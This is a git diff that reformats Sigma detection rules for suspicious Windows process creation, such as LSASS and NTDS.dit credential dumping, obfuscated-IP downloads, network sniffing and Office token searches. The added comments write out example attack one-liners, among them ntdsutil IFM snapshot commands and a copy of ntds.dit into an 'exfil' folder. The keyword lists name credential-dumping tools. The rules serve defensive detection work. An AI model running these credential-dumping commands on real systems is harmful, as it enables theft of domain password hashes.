@@ -1,14 +1,11 @@ title: LSASS Dump Keyword In CommandLine id: ffa6861c-4461-4f59-8a41-578c39f3f23e related: - - id: a5a2d357-1ab8-4675-a967-ef9990a59391 - type: derived + - id: a5a2d357-1ab8-4675-a967-ef9990a59391 + type: derived status: test -description: 'Detects the presence of the keywords "lsass" and ".dmp" in the commandline, - which could indicate a potential attempt to dump or create a dump of the lsass - process. - - ' +description: | + Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. references: - https://github.com/Hackndo/lsassy - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf @@ -16,8 +13,7 @@ references: - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - https://github.com/helpsystems/nanodump - https://github.com/CCob/MirrorDump -author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron - Systems) +author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/08/29 tags: 
@@ -31,25 +27,25 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: - - lsass.dmp - - lsass.zip - - lsass.rar - - Andrew.dmp - - Coredump.dmp - - NotLSASS.zip - - lsass_2 - - lsassdump - - lsassdmp - - CommandLine|contains|all: - - lsass - - .dmp - - CommandLine|contains|all: - - SQLDmpr - - .mdmp - - CommandLine|contains|all: - - nanodump - - .dmp + - CommandLine|contains: + - lsass.dmp + - lsass.zip + - lsass.rar + - Andrew.dmp + - Coredump.dmp + - NotLSASS.zip # https://github.com/CCob/MirrorDump + - lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp + - lsassdump + - lsassdmp + - CommandLine|contains|all: + - lsass + - .dmp + - CommandLine|contains|all: + - SQLDmpr + - .mdmp + - CommandLine|contains|all: + - nanodump + - .dmp condition: process_creation and selection falsepositives: - Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml
index ec151f422..310c65511 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml
@@ -1,15 +1,12 @@ title: Potential File Download Via MS-AppInstaller Protocol Handler id: 180c7c5c-d64b-4a63-86e9-68910451bc8b related: - - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a - type: derived + - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a + type: derived status: experimental -description: 'Detects usage of the "ms-appinstaller" protocol handler via command - line to potentially download arbitrary files via AppInstaller.EXE - +description: | + Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
@@ -26,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ms-appinstaller://?source= - http condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml b/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml
index e127bfae4..c68f737b4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml
@@ -1,8 +1,7 @@ title: Suspicious Network Command id: a29c1813-ab1f-4dde-b489-330b952e91ae status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
@@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ipconfig /all - netsh interface show interface - arp -a
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml b/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml
index beb0c354f..f4e33d594 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml
@@ -1,9 +1,7 @@ title: Suspicious Scan Loop Network id: f8ad2e2c-40b6-4117-84d7-20b89896ab23 status: test -description: Adversaries may attempt to get a listing of other systems by IP address, - hostname, or other logical identifier on a network that may be used for Lateral - Movement from the current system +description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md - https://ss64.com/nt/for.html
@@ -23,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection_loop: - CommandLine|contains: + CommandLine|contains: - 'for ' - 'foreach ' selection_tools: - CommandLine|contains: + CommandLine|contains: - nslookup - ping condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml b/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml
index 92da5eb34..770626bd0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml
@@ -1,17 +1,10 @@ title: Potential Network Sniffing Activity Using Network Tools id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5 status: test -description: 'Detects potential network sniffing via use of network tools such as - "tshark", "windump". - - Network sniffing refers to using the network interface on a system to monitor - or capture information sent over a wired or wireless connection. - - An adversary may place a network interface into promiscuous mode to passively - access data in transit over the network, or use span ports to capture a larger - amount of data. - - ' +description: | + Detects potential network sniffing via use of network tools such as "tshark", "windump". + Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. + An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
@@ -29,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_tshark: - CommandLine|contains: -i - NewProcessName|endswith: \tshark.exe + CommandLine|contains: -i + NewProcessName|endswith: \tshark.exe selection_windump: - NewProcessName|endswith: \windump.exe + NewProcessName|endswith: \windump.exe condition: process_creation and (1 of selection_*) falsepositives: - Legitimate administration activity to troubleshoot network issues
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml b/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml
index ed6d2a60a..793569b8a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml
@@ -1,14 +1,9 @@ title: Execution of Suspicious File Type Extension id: c09dad97-1c78-4f71-b127-7edb2b8e491a status: experimental -description: 'Detects whether the image specified in a process creation event doesn''t - refer to an ".exe" (or other known executable extension) file. This can be caused - by process ghosting or other unorthodox methods to start a process. - - This rule might require some initial baselining to align with some third party - tooling in the user environment. - - ' +description: | + Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. + This rule might require some initial baselining to align with some third party tooling in the user environment. references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems)
@@ -24,66 +19,65 @@ detection: EventID: 4688 Channel: Security known_image_extension: - NewProcessName|endswith: + NewProcessName|endswith: - .bin - .cgi - .com - .exe - .scr - - .tmp - filter_main_image: - NewProcessName: + - .tmp # sadly many installers use this extension + filter_main_image: # Windows utilities without extension + NewProcessName: - System - Registry - MemCompression - vmmem filter_main_msi_installers: - NewProcessName|contains: :\Windows\Installer\MSI + NewProcessName|contains: :\Windows\Installer\MSI filter_main_driver_store: - NewProcessName|contains: :\Windows\System32\DriverStore\FileRepository\ + NewProcessName|contains: :\Windows\System32\DriverStore\FileRepository\ filter_main_msi_rollbackfiles: - NewProcessName|contains: :\Config.Msi\ - NewProcessName|endswith: + NewProcessName|contains: :\Config.Msi\ + NewProcessName|endswith: - .rbf - .rbs filter_main_windows_temp: - - ParentProcessName|contains: :\Windows\Temp\ - - NewProcessName|contains: :\Windows\Temp\ + - ParentProcessName|contains: :\Windows\Temp\ + - NewProcessName|contains: :\Windows\Temp\ filter_main_deleted: - NewProcessName|contains: :\$Extend\$Deleted\ + NewProcessName|contains: :\$Extend\$Deleted\ filter_main_empty: - NewProcessName: + NewProcessName: - '-' - '' filter_main_null: - NewProcessName: null + NewProcessName: filter_optional_avira: ParentProcessName|contains: :\ProgramData\Avira\ filter_optional_nvidia: - NewProcessName|contains: NVIDIA\NvBackend\ - NewProcessName|endswith: .dat + NewProcessName|contains: NVIDIA\NvBackend\ + NewProcessName|endswith: .dat filter_optional_winpakpro: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\WINPAKPRO\ - :\Program Files\WINPAKPRO\ - NewProcessName|endswith: .ngn + NewProcessName|endswith: .ngn filter_optional_myq_server: - NewProcessName|endswith: + NewProcessName|endswith: - :\Program Files (x86)\MyQ\Server\pcltool.dll - :\Program Files\MyQ\Server\pcltool.dll filter_optional_wsl: - 
NewProcessName|contains|all: + NewProcessName|contains|all: - \AppData\Local\Packages\ - \LocalState\rootfs\ filter_optional_lzma_exe: - NewProcessName|endswith: \LZMA_EXE + NewProcessName|endswith: \LZMA_EXE filter_optional_firefox: - NewProcessName|contains: :\Program Files\Mozilla Firefox\ + NewProcessName|contains: :\Program Files\Mozilla Firefox\ filter_optional_docker: ParentProcessName: C:\Windows\System32\services.exe - NewProcessName|endswith: com.docker.service - condition: process_creation and (not known_image_extension and not 1 of filter_main_* - and not 1 of filter_optional_*) + NewProcessName|endswith: com.docker.service + condition: process_creation and (not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml b/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml
index aad0e1e3f..bc01117d6 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml
@@ -1,8 +1,7 @@ title: Non-privileged Usage of Reg or Powershell id: 8f02c935-effe-45b3-8fc9-ef8696a9e41d status: test -description: Search for usage of reg or Powershell by non-privileged users to modify - service configuration in registry +description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
@@ -19,20 +18,20 @@ detection: EventID: 4688 Channel: Security reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - add powershell: - CommandLine|contains: + CommandLine|contains: - powershell - set-itemproperty - ' sp ' - new-itemproperty select_data: - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - Services - CommandLine|contains: + CommandLine|contains: - ImagePath - FailureCommand - ServiceDLL
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml
index 4a8fc943c..7a1fa3f2b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml
@@ -24,46 +24,51 @@ detection: EventID: 4688 Channel: Security selection_tool: - - NewProcessName|endswith: - - \NTDSDump.exe - - \NTDSDumpEx.exe - - CommandLine|contains|all: - - ntds.dit - - system.hiv - - CommandLine|contains: NTDSgrab.ps1 + # https://github.com/zcgonvh/NTDSDumpEx + - NewProcessName|endswith: + - \NTDSDump.exe + - \NTDSDumpEx.exe + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - ntds.dit + - system.hiv + - CommandLine|contains: NTDSgrab.ps1 selection_oneliner_1: - CommandLine|contains|all: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: - ac i ntds - create full selection_onliner_2: - CommandLine|contains|all: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: - '/c copy ' - \windows\ntds\ntds.dit selection_onliner_3: - CommandLine|contains|all: + # ntdsutil "activate instance ntds" "ifm" "create full c:\windows\temp\data\" "quit" "quit" + CommandLine|contains|all: - activate instance ntds - create full selection_powershell: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - ntds.dit set1_selection_ntds_dit: - CommandLine|contains: ntds.dit + CommandLine|contains: ntds.dit set1_selection_image_folder: - - ParentProcessName|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ - - NewProcessName|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ + - ParentProcessName|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ + - NewProcessName|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ condition: process_creation and (1 of selection* or all of set1*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml b/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml
index 491d57d9c..4b71eca72 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml
@@ -1,11 +1,10 @@ title: Potentially Suspicious Call To Win32_NTEventlogFile Class id: caf201a9-c2ce-4a26-9c3a-2b9525413711 related: - - id: e2812b49-bae0-4b21-b366-7c142eafcde2 - type: similar + - id: e2812b49-bae0-4b21-b366-7c142eafcde2 + type: similar status: experimental -description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially - suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script references: - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_class: - CommandLine|contains: Win32_NTEventlogFile + CommandLine|contains: Win32_NTEventlogFile selection_function: - CommandLine|contains: + CommandLine|contains: - .BackupEventlog( - .ChangeSecurityPermissions( - .ChangeSecurityPermissionsEx(
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml
index fc5e77648..f2b2d29cb 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml
@@ -1,11 +1,10 @@ title: Use Short Name Path in Command Line id: 349d891d-fef0-4fe4-bc53-eee623a15969 related: - - id: a96970af-f126-420d-90e1-d37bf25e50e1 - type: similar + - id: a96970af-f126-420d-90e1-d37bf25e50e1 + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN 
@@ -24,28 +23,27 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ~1\ - ~2\ filter: - - ParentProcessName: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files\GPSoftware\Directory Opus\dopus.exe - - ParentProcessName|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - \veam.backup.shell.exe - - \winget.exe - - \Everything\Everything.exe - - ParentProcessName|contains: \AppData\Local\Temp\WinGet\ - - CommandLine|contains: - - \appdata\local\webex\webex64\meetings\wbxreport.exe - - C:\Program Files\Git\post-install.bat - - C:\Program Files\Git\cmd\scalar.exe + - ParentProcessName: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files\GPSoftware\Directory Opus\dopus.exe + - ParentProcessName|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - \veam.backup.shell.exe + - \winget.exe + - \Everything\Everything.exe + - ParentProcessName|contains: \AppData\Local\Temp\WinGet\ + - CommandLine|contains: + - \appdata\local\webex\webex64\meetings\wbxreport.exe + - C:\Program Files\Git\post-install.bat + - C:\Program Files\Git\cmd\scalar.exe condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. level: medium ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml
index 8bb36804d..0cdabc78e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml
@@ -1,11 +1,10 @@ title: Use Short Name Path in Image id: a96970af-f126-420d-90e1-d37bf25e50e1 related: - - id: 349d891d-fef0-4fe4-bc53-eee623a15969 - type: similar + - id: 349d891d-fef0-4fe4-bc53-eee623a15969 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
@@ -24,29 +23,28 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - ~1\ - ~2\ filter1: - - ParentProcessName: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - ParentProcessName|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - Product: InstallShield (R) - - Description: InstallShield (R) Setup Engine - - Company: InstallShield Software Corporation + - ParentProcessName: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) + - ParentProcessName|endswith: + - \WebEx\WebexHost.exe # Spawns a shortened version of the CLI and Image processes + - \thor\thor64.exe + - Product: InstallShield (R) + - Description: InstallShield (R) Setup Engine + - Company: InstallShield Software Corporation filter_installers: - - NewProcessName|contains|all: - - \AppData\ - - \Temp\ - - NewProcessName|endswith: - - ~1\unzip.exe - - ~1\7zG.exe + - NewProcessName|contains|all: + - \AppData\ + - \Temp\ + - NewProcessName|endswith: + - ~1\unzip.exe + - ~1\7zG.exe condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml
index 8177e4a11..26ab9abbc 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml
@@ -1,11 +1,10 @@ title: Use NTFS Short Name in Command Line id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 related: - - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b - type: similar + - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
@@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ~1.exe - ~1.bat - ~1.msi
@@ -44,13 +43,12 @@ detection: - ~2.js - ~2.hta filter: - - ParentProcessName|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE + - ParentProcessName|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml
index 0a970c96c..74c071900 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml
@@ -1,11 +1,10 @@ title: Use NTFS Short Name in Image id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b related: - - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 - type: similar + - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image based detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
@@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - ~1.bat - ~1.dll - ~1.exe
@@ -52,11 +51,10 @@ detection: filter_optional_thor: ParentProcessName|endswith: \thor\thor64.exe filter_optional_winzip: - NewProcessName: C:\PROGRA~1\WinZip\WZPREL~1.EXE + NewProcessName: C:\PROGRA~1\WinZip\WZPREL~1.EXE filter_optional_vcred: - NewProcessName|endswith: \VCREDI~1.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + NewProcessName|endswith: \VCREDI~1.EXE + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Software Installers level: medium
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
index ded20c553..219298ef1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
@@ -1,8 +1,7 @@ title: Obfuscated IP Download Activity id: cb5a2333-56cf-4562-8fcb-22ba1bca728d status: test -description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) - in an URL combined with a download command +description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
@@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection_command: - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget '
@@ -28,26 +27,31 @@ detection: - DownloadFile - DownloadString selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_command and 1 of selection_ip_* and - not 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_command and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml
index 46c3d6d39..0e97a792c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml
@@ -1,8 +1,7 @@ title: Obfuscated IP Via CLI id: 56d19cb4-6414-4769-9644-1ed35ffbb148 status: experimental -description: Detects usage of an encoded/obfuscated version of an IP address (hex, - octal, etc.) via command line +description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
@@ -19,30 +18,35 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \ping.exe - \arp.exe selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_img and 1 of selection_ip_* and not - 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_img and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml b/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml
index 64a4a0563..1fa38856d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml
@@ -1,9 +1,7 @@ title: Suspicious Office Token Search Via CLI id: 6d3a3952-6530-44a3-8554-cf17c116c615 status: test -description: Detects possible search for office tokens via CLI by looking for the - string "eyJ0eX". This string is used as an anchor to look for the start of the - JWT token used by office and similar apps. +description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps. references: - https://mrd0x.com/stealing-tokens-from-office-applications/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - eyJ0eXAiOi + CommandLine|contains: + - eyJ0eXAiOi # {"typ": - ' eyJ0eX' - ' "eyJ0eX"' - - ' ''eyJ0eX''' + - " 'eyJ0eX'" condition: process_creation and selection falsepositives: - Unknown
